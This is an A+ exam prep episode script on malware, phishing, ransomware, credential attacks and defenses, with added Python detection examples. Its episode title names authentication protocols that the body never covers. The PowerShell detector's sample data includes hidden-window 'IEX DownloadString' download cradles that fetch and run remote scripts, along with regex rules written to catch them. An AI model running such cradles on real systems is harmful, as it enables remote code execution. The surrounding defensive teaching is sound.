Episode 110. Authentication — RADIUS, TACACS+, Kerberos
Digital threats and vulnerabilities represent some of the most persistent risks that technicians must identify and manage. These threats include everything from malware and phishing to internal misuse and system misconfiguration. On the A Plus exam, questions may ask you to identify a particular threat based on symptoms, describe how it spreads, or recommend a response. In real-world environments, recognizing and responding to these issues quickly can prevent serious damage. As a support technician, understanding how digital threats work is the first step toward defending users and systems effectively.
Malware is short for malicious software, and it refers to any program designed to harm, exploit, or compromise a computer system. Malware comes in many forms, and each type has a different purpose or delivery method. Common types include viruses, which attach to other files and spread when opened; worms, which replicate through networks without user action; Trojans, which disguise themselves as legitimate applications; ransomware, which encrypts data for extortion; spyware, which monitors user behavior; and rootkits, which hide malware deep in the system. Symptoms of infection can range from slow performance and pop-ups to stolen credentials and system instability.
Phishing is a form of social engineering that uses deception to trick users into revealing sensitive information. These attacks are most often delivered through email but can also appear as text messages, phone calls, or chat messages. A phishing email may pretend to be from a trusted source, such as a bank or supervisor, and include a link to a fake website. That site may look identical to the real one but is designed to steal usernames, passwords, or other data. Phishing may also be used to convince users to download malware or approve fraudulent financial transfers.
More advanced forms of phishing include spear phishing and whaling. Spear phishing targets specific individuals, often using personal details to increase credibility. For example, an attacker might use the victim’s name, job title, or recent activity to craft a more believable message. Whaling refers to attacks aimed at high-level targets, such as executives, directors, or financial officers. These messages often attempt to bypass normal review processes and prompt urgent action, such as wire transfers or document approvals. Because they are so targeted, these attacks are more dangerous than mass phishing campaigns.
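The link tricks described above can be checked mechanically, and doing so shows why "hover over the link" is taught: the visible text and the actual target are separate things. The following Python example, written for this episode and not part of the original script, pulls every link out of a constructed HTML email body and flags the classic tells: a target domain that differs from the domain shown in the link text, a domain that differs from the sender's, a bare IP address as the host, user-info before an at-sign (so "acmebank.example@evil.example" lands on evil.example), and punycode hosts that may be lookalikes. The sample message, the sender address, and the "last two labels" approximation of a registrable domain are this example's own assumptions; a production filter would use the Public Suffix List.

```python
import ipaddress
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message for this example (not a real phishing email).
SAMPLE_FROM = "Acme Bank Security <alerts@acmebank.example>"
SAMPLE_BODY = """
<p>Your account has been locked. Verify within 24 hours:
<a href="https://acmebank.example.verify-login.net/reset">https://acmebank.example/reset</a></p>
<p>Or contact <a href="http://203.0.113.7/help">support</a>.</p>
<p>You can also <a href="https://acmebank.example@login-acmebank.example.com/">log in</a> here.</p>
<p><a href="https://acmebank.example/statements">View statements</a></p>
"""


class _LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    # Approximation: keep the last two labels. Production code should consult the
    # Public Suffix List so that 'bank.co.uk' does not collapse to 'co.uk'.
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


# Something that looks like a domain or URL inside the visible link text.
_DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)")


def analyze_links(from_header, html_body):
    """Return {href: [reason, ...]} for each link that trips at least one heuristic."""
    _, sender = parseaddr(from_header)
    sender_domain = registrable_domain(sender.rpartition("@")[2])
    extractor = _LinkExtractor()
    extractor.feed(html_body)
    suspicious = {}
    for href, text in extractor.links:
        url = urlparse(href)
        host = (url.hostname or "").lower()
        if not host:
            continue  # mailto:, relative and javascript: links are out of scope here
        reasons = []
        try:
            ipaddress.ip_address(host)
            reasons.append("raw_ip_host")            # legitimate senders rarely link to bare IPs
        except ValueError:
            if host.startswith("xn--") or ".xn--" in host:
                reasons.append("punycode_host")      # possible homoglyph lookalike domain
            if registrable_domain(host) != sender_domain:
                reasons.append("sender_domain_mismatch")
        if url.username is not None:
            reasons.append("userinfo_in_url")        # 'https://bank.example@evil.example/' trick
        match = _DOMAIN_IN_TEXT.search(text.lower())
        if match and registrable_domain(match.group(1)) != registrable_domain(host):
            reasons.append("display_text_mismatch")  # text names one site, href goes to another
        if reasons:
            suspicious[href] = reasons
    return suspicious


if __name__ == "__main__":
    for href, reasons in analyze_links(SAMPLE_FROM, SAMPLE_BODY).items():
        print(f"{href}\n    {', '.join(reasons)}")
```

Only the "View statements" link, which points back at the sender's own domain, passes clean. A sender-domain mismatch alone is a weak signal (newsletters use tracking domains all the time), which is why the function returns reasons rather than a verdict and leaves the scoring to the caller.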
Ransomware is one of the most financially damaging types of malware. Once it executes, it encrypts files and displays a ransom demand, usually payable in cryptocurrency, in exchange for a decryption key. Paying does not guarantee recovery, and many ransomware groups now also steal data before encrypting it so they can threaten to publish it. Ransomware is often delivered through phishing attachments or by exploiting unpatched, internet-facing vulnerabilities, and inside a large network it can reach shared folders and other hosts within minutes and halt business operations. The most important defenses are backups the infected machine cannot reach (offline or otherwise immutable copies), tested restore procedures, prompt patching, and user education.
Spyware and keyloggers operate quietly in the background, collecting information without the user’s knowledge. Spyware may gather data on browsing habits, keystrokes, login credentials, or even screenshots. Keyloggers, in particular, record everything typed on the keyboard and send that data to the attacker. These tools are often bundled with free software or embedded in malicious advertising. Because they operate silently and don’t always disrupt system performance, they can be difficult to detect without specialized scanning tools.
Rootkits are among the most dangerous and difficult types of malware to detect and remove. A rootkit hides the presence of an attacker's software, often by running at the kernel level or even in the boot process or firmware, where it can intercept system calls and conceal files, processes, and network connections from antivirus tools running on the same system. Rootkits may modify system processes, intercept commands, or create hidden user accounts, and they are typically used to maintain long-term access to compromised machines. Because a compromised operating system cannot be trusted to report on itself, detection usually means scanning from outside it, for example after booting from known-good media, and removal usually means wiping the system and reinstalling the operating system from trusted media.
Fileless malware is a category of threat that does not write a traditional executable to disk. Instead it runs in memory and abuses legitimate, already-present system tools such as PowerShell or WMI (Windows Management Instrumentation) to do its work, sometimes persisting only as a registry value or scheduled task that relaunches a script. Signature-based antivirus has little to scan, so detection has to rely on behavior: which process launched the tool, what command line it was given (encoded or hidden-window PowerShell, for example), and what it did next. Endpoint monitoring with command-line logging and PowerShell script block logging provides that visibility. Fileless techniques appear both in targeted attacks and as one stage of larger intrusion campaigns.
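To make the "watch the behavior, not the file" idea concrete, here is an added Python example, written for this episode and not taken from the original script or any vendor product. It scores process-creation events of the kind an EDR agent or Sysmon records: who the parent process was (Word or the WMI provider host spawning PowerShell is far more suspicious than Explorer doing it), which command-line flags were used, and whether an -EncodedCommand payload decodes to a download cradle. The events, the field names, the indicator weights and the alert threshold are all this example's own constructions.

```python
import base64
import ntpath
import re

# Process-creation events shaped like an EDR or Sysmon Event ID 1 record.
# Constructed sample data for this example, not taken from a real incident.
STAGE2_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(STAGE2_PAYLOAD.encode("utf-16le")).decode()  # -EncodedCommand format

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},         # admin script, benign
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},          # macro -> download cradle
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -noni -ep bypass -c \"IEX ((New-Object Net.WebClient)"
                ".DownloadString('http://203.0.113.9/s'))\""},                      # WMI subscription fired
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_PARENTS = {"wmiprvse.exe": "wmi_parent",
                      "winword.exe": "office_parent", "excel.exe": "office_parent",
                      "outlook.exe": "office_parent"}
# (pattern, indicator, weight); weights and the alert threshold are this example's own choices
FLAG_RULES = [
    (r"-nop(rofile)?\b", "no_profile", 1),
    (r"-noni(nteractive)?\b", "non_interactive", 1),
    (r"-w(indowstyle)?\s+hidden\b", "hidden_window", 1),
    (r"-e(p|xecutionpolicy)\s+bypass\b", "bypass_policy", 1),
]
CONTENT_RULES = [   # applied to the raw command line and to the decoded payload
    (r"\biex\b|invoke-expression", "invoke_expression", 2),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", "download_cradle", 3),
]
ENC_FLAG = re.compile(r"-e(c|nc|ncodedcommand)?", re.I)   # powershell.exe accepts these prefixes


def decode_encoded_command(cmdline):
    """UTF-16LE text behind -EncodedCommand; '' if the payload will not decode; None if absent."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG.fullmatch(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return None


def score_event(event):
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmdline = event["cmdline"]
    score, indicators, decoded = 0, [], None
    if image in SCRIPT_HOSTS:
        if parent in SUSPICIOUS_PARENTS:          # who launched the script host matters most
            indicators.append(SUSPICIOUS_PARENTS[parent])
            score += 3
        for pattern, name, weight in FLAG_RULES:
            if re.search(pattern, cmdline, re.I):
                indicators.append(name)
                score += weight
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            indicators.append("encoded_command")
            score += 3
    for pattern, name, weight in CONTENT_RULES:
        if re.search(pattern, cmdline + " " + (decoded or ""), re.I):
            indicators.append(name)
            score += weight
    return score, indicators, decoded


def detect(events, threshold=5):
    alerts = []
    for event in events:
        score, indicators, decoded = score_event(event)
        if score >= threshold:
            alerts.append({"parent": ntpath.basename(event["parent"]), "score": score,
                           "indicators": indicators, "decoded": decoded})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["parent"], alert["score"], alert["indicators"])
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The administrator's scheduled backup script scores one point and stays quiet; the two fileless events score well above the threshold even though no malicious file was ever written. Note that the decoding step is what turns an opaque base64 blob into something a rule can match, which is exactly why attackers encode in the first place and why command-line logging must be on.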
Insider threats are a serious concern, and they do not always involve malicious intent. An insider threat may be an employee who intentionally steals data, leaks confidential files, or sabotages systems. But more often, insiders become threats through negligence. This could include sending sensitive information to the wrong recipient, reusing weak passwords, or bypassing security protocols. Limiting user permissions, providing regular training, and monitoring user behavior are essential steps in managing insider risk. Some environments also implement data loss prevention tools to restrict file movement or detect anomalies.
For more cyber related content and books, please check out cyber author dot me. Also, there are other prep casts on Cybersecurity and more at Bare Metal Cyber dot com.
Brute-force attacks and credential stuffing are common methods used by attackers to gain unauthorized access to user accounts. A brute-force attack tries many password guesses against one account until it finds the correct one, while credential stuffing takes username and password pairs leaked in earlier breaches and tries each pair against many other sites, betting that users reuse passwords. Both are automated. The defenses differ: per-account lockout thresholds stop brute force, but credential stuffing makes only one or two attempts per account and never trips them, so it has to be caught by throttling repeated failures from the same source and by checking submitted passwords against known-breached lists. Multi-factor authentication blunts both, because a correct password alone is no longer enough to log in.
Software vulnerabilities also pose a significant risk if left unpatched. Vulnerabilities are flaws in code that attackers can exploit to gain control, escalate privileges, or install malware. Some are known to the vendor and have available fixes, while others are called zero-day vulnerabilities because they are exploited before a fix is available, sometimes before the vendor is even aware of them. Installing updates regularly closes the known holes; for zero-days, reducing exposed services and monitoring for exploitation behavior are what help until a patch ships. Patch management systems in business environments ensure that all endpoints receive critical updates in a timely and controlled manner.
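The difference between the two attacks is easiest to see in code. The following Python example, added here and not part of the original episode, models a login guard with two counters: failures per account, which locks an account after a burst of guesses, and failures per source address, which is the only counter credential stuffing ever trips because it spends one guess per account. It also refuses a correct password that appears in a breach corpus and forces a reset, since that is the exact credential a stuffing attack would succeed with. The user directory, the breached-password list, the thresholds and the use of plain SHA-256 in place of a real salted password hash are this example's own assumptions.

```python
import hashlib
import hmac
from collections import defaultdict, deque


def _digest(password):
    # SHA-256 stands in for a real password hash (bcrypt/argon2 with per-user salts)
    # so the example stays dependency-free; do not store passwords this way in production.
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user directory and breached-password corpus for this example.
USER_PASSWORDS = {f"user{i:02d}": _digest("Winter2024!") for i in range(30)}
USER_PASSWORDS["user07"] = _digest("Summer2023!")     # reused a password that later leaked
USER_PASSWORDS["alice"] = _digest("correct horse battery staple")
BREACHED_DIGESTS = frozenset({_digest("Summer2023!"), _digest("password"), _digest("123456")})


class LoginGuard:
    """Two counters: failures per account (stops brute force) and failures per source
    (stops credential stuffing, which spreads one guess across many accounts so that no
    single account ever reaches its lockout threshold)."""

    def __init__(self, account_threshold=5, source_threshold=20, window=600, lockout=900):
        self.account_threshold = account_threshold
        self.source_threshold = source_threshold
        self.window = window          # seconds of history that count toward a threshold
        self.lockout = lockout        # seconds an account stays locked
        self._account_failures = defaultdict(deque)
        self._source_failures = defaultdict(deque)
        self._locked_until = {}

    def _recent(self, failures, now):
        while failures and failures[0] <= now - self.window:
            failures.popleft()
        return len(failures)

    def attempt(self, now, username, password, source_ip):
        if self._locked_until.get(username, 0) > now:
            return "locked_account"
        if self._recent(self._source_failures[source_ip], now) >= self.source_threshold:
            return "throttled_source"
        stored = USER_PASSWORDS.get(username)
        submitted = _digest(password)
        correct = stored is not None and hmac.compare_digest(stored, submitted)
        if correct and submitted not in BREACHED_DIGESTS:
            self._account_failures[username].clear()
            return "success"
        # Wrong password, unknown user, or a correct-but-breached password all count as failures.
        self._account_failures[username].append(now)
        self._source_failures[source_ip].append(now)
        if self._recent(self._account_failures[username], now) >= self.account_threshold:
            self._locked_until[username] = now + self.lockout
        # Right password but it appears in a breach corpus: refuse and force a reset,
        # otherwise a stuffing attack carrying this credential would simply succeed.
        return "breached_password" if correct else "failure"


def run_simulation():
    guard = LoginGuard()
    results = {}
    # 1. Brute force: one source hammers one account, a new guess every 5 seconds.
    guesses = ["password", "123456", "qwerty", "letmein", "alice2024", "Alice123!", "welcome1", "Passw0rd"]
    results["brute_force"] = [guard.attempt(5 * i, "alice", pw, "198.51.100.5") for i, pw in enumerate(guesses)]
    # 2. The real user, from her own address, while the lockout is active and after it expires.
    results["victim_during_lockout"] = guard.attempt(100, "alice", "correct horse battery staple", "203.0.113.50")
    results["victim_after_lockout"] = guard.attempt(1000, "alice", "correct horse battery staple", "203.0.113.50")
    # 3. Credential stuffing: one leaked password sprayed across 30 accounts, one try each.
    results["stuffing"] = [guard.attempt(2000 + 2 * i, f"user{i:02d}", "Summer2023!", "198.51.100.77")
                           for i in range(30)]
    return results


if __name__ == "__main__":
    for name, outcome in run_simulation().items():
        print(name, outcome)
```

Running the simulation shows the trade-off the paragraph describes: the brute-force source is locked out after five guesses, but so is the legitimate user until the lockout expires, which is why lockout durations are kept short and paired with MFA. The stuffing run never locks any account; it is the per-source counter that stops it after twenty failures, and the one account whose password really was in the leak is refused with a reset demand instead of a successful login.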
Misconfigurations are another source of risk that is often overlooked. A misconfigured system may have open ports, default passwords, or excessive permissions that give attackers an easy entry point. Common targets include routers, printers, networked cameras, and other internet of things devices. These systems often come with factory default credentials like admin and password, which must be changed immediately during deployment. Default configurations should always be reviewed, hardened, and documented before a device is connected to a production environment.
Here’s a scenario that demonstrates how ransomware can spread. A user receives an email that appears to contain an invoice and opens the attachment without verifying the sender. The file runs a script that encrypts all local documents and then begins encrypting the shared network folders the user has write access to. Once the infection is identified, the IT team isolates the system from the network, rebuilds it from trusted media, confirms that the backup copies were not reachable from the infected machine, restores the files from a recent backup, and updates all security software. As a long-term response, the company strengthens its email filtering and launches mandatory phishing awareness training for all staff.
Watering hole attacks take a more indirect approach. Instead of targeting a victim directly, the attacker compromises a website or platform that the target is known to visit regularly. When the victim accesses the site, malware is downloaded or credentials are harvested. These attacks are difficult to detect and can impact multiple users who all trust the same web resource. Web filtering, traffic monitoring, and browser patching are essential defenses. Organizations must also be cautious about which sites are whitelisted or allowed in security policies.
While most threats are digital, physical breaches remain relevant and often complement cyberattacks. Tailgating, for example, allows someone to gain physical access to a secured area by following an authorized user through a locked door. Once inside, an attacker may insert rogue devices, access exposed terminals, or steal data. Combating this requires both physical controls like badge readers and mantraps, as well as user training to prevent social engineering at entry points. The best defense combines physical awareness with technical restrictions.
Honeypots are decoy systems designed to attract attackers and observe their behavior. These systems appear to be legitimate targets, but they are isolated from real production systems. Once an attacker engages with a honeypot, their actions can be monitored, recorded, and analyzed. Honeypots can delay intrusion attempts, mislead adversaries, and provide insight into attack patterns. While honeypots are not a frontline defense for everyday systems, they are a valuable tool for researchers, security analysts, and large enterprises seeking better threat intelligence.
Modern antimalware tools use behavioral and heuristic analysis in addition to traditional signature-based scanning. Rather than only looking for known byte patterns in files, behavioral detection watches what a program does at run time: unexpected network activity, suspicious file creation or mass modification, or attempts to escalate privileges. Heuristic detection applies rules and statistical models to flag previously unknown code that resembles known malicious patterns. These technologies are what give defenders a chance against zero-day exploits, polymorphic malware, and fileless attacks that leave nothing for a static scanner to match; their cost is false positives, because legitimate software sometimes behaves suspiciously too.
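The ransomware scenario a few paragraphs back and the description of behavioral detection just above come together in the following Python example, which is added here and is not code from the original episode or from any product. It plays the role of an endpoint behavioral rule watching file events: a process that overwrites many files with high-entropy (encrypted-looking) data and renames them to a new extension within a short window, especially after dropping a ransom note, is encrypting files. The example also shows the obvious false positive: Word saving .docx files produces equally high entropy, because the format is compressed, so entropy alone must never be the trigger. The event stream, field names, thresholds and process names are constructed for this example.

```python
import math
import ntpath
import random
import re
from collections import defaultdict


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


RANSOM_NOTE = re.compile(r"(readme|decrypt|recover|restore).*\.(txt|html|hta)$", re.I)


class RansomwareDetector:
    """Correlate per-process file activity: many high-entropy overwrites AND extension-changing
    renames of the same files inside one window looks like encryption in progress. Entropy on
    its own is not a signal; .docx, .zip and .jpg are compressed and already score near 8."""

    def __init__(self, window=60, min_victims=10, entropy_threshold=7.0):
        self.window = window
        self.min_victims = min_victims
        self.entropy_threshold = entropy_threshold
        self._writes = defaultdict(dict)    # pid -> {path: ts} of high-entropy overwrites
        self._renames = defaultdict(dict)   # pid -> {old_path: ts} of extension-changing renames
        self._notes = defaultdict(set)      # pid -> ransom-note-like files it created
        self._alerted = set()

    def _prune(self, table, now):
        for path, ts in list(table.items()):
            if ts <= now - self.window:
                del table[path]

    def observe(self, event):
        """Feed one file event; return an alert dict the first time a process crosses the line."""
        pid, ts, op = event["pid"], event["ts"], event["op"]
        if op == "write" and shannon_entropy(event["data"]) >= self.entropy_threshold:
            self._writes[pid][event["path"]] = ts
        elif op == "rename":
            old_ext = ntpath.splitext(event["path"])[1].lower()
            new_ext = ntpath.splitext(event["new_path"])[1].lower()
            if old_ext != new_ext:
                self._renames[pid][event["path"]] = ts
        elif op == "create" and RANSOM_NOTE.search(ntpath.basename(event["path"])):
            self._notes[pid].add(event["path"])
        self._prune(self._writes[pid], ts)
        self._prune(self._renames[pid], ts)
        victims = sorted(self._writes[pid].keys() & self._renames[pid].keys())
        if len(victims) >= self.min_victims and pid not in self._alerted:
            self._alerted.add(pid)
            return {"pid": pid, "image": event["image"], "ts": ts, "victims": len(victims),
                    "directories": len({ntpath.dirname(p) for p in victims}),
                    "ransom_note": bool(self._notes[pid]), "sample": victims[:3]}
        return None


def build_sample_events():
    """Constructed event stream: a benign Word session, then ransomware hitting a file share."""
    rng = random.Random(20240601)
    events = []
    for i in range(3):   # Word saving .docx: compressed, high entropy, but no extension change
        events.append({"ts": i, "pid": 1200, "image": "WINWORD.EXE", "op": "write",
                       "path": rf"\\fileserver\finance\reports\report{i}.docx", "data": rng.randbytes(4096)})
    events.append({"ts": 9, "pid": 4412, "image": "invoice_7731.exe", "op": "create",
                   "path": r"\\fileserver\finance\HOW_TO_RECOVER_FILES.txt"})
    for i in range(12):  # overwrite with ciphertext-like data, then rename to .locked
        path = rf"\\fileserver\finance\Q{i % 4 + 1}\budget{i}.xlsx"
        events.append({"ts": 10 + 2 * i, "pid": 4412, "image": "invoice_7731.exe", "op": "write",
                       "path": path, "data": rng.randbytes(4096)})
        events.append({"ts": 11 + 2 * i, "pid": 4412, "image": "invoice_7731.exe", "op": "rename",
                       "path": path, "new_path": path + ".locked"})
    return events


def run_detector(events):
    detector = RansomwareDetector()
    return [alert for alert in map(detector.observe, events) if alert]


if __name__ == "__main__":
    for alert in run_detector(build_sample_events()):
        print(alert)
```

The alert fires on the tenth victim, roughly twenty seconds into the encryption run, with the note already on disk; an endpoint agent would kill the process and isolate the host at that point, which is the "isolate the system from the network" step in the scenario, done by machine rather than by a technician. The three Word saves never produce an alert despite their entropy, because nothing was renamed.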
Preventing social engineering requires ongoing effort. Security awareness training helps users recognize phishing, tailgating, baiting, and other manipulation tactics. Organizations should run regular training sessions and simulate attacks to measure user response. For example, sending test phishing emails can help identify users who are most at risk. Training should be paired with clear reporting channels, such as a help desk procedure for suspicious emails, and reinforced with policies that discourage risky behavior.
To summarize, the threat landscape includes both external and internal actors using a wide range of tactics to exploit systems. Malware, phishing, insider risks, brute-force and credential-stuffing attacks, unpatched vulnerabilities, and misconfigurations all contribute to security incidents. Controls like behavioral monitoring, timely patching, and user education help prevent these issues or catch them before they cause serious damage. This domain is essential for support technicians and is one of the most frequently tested areas on the A Plus certification exam.
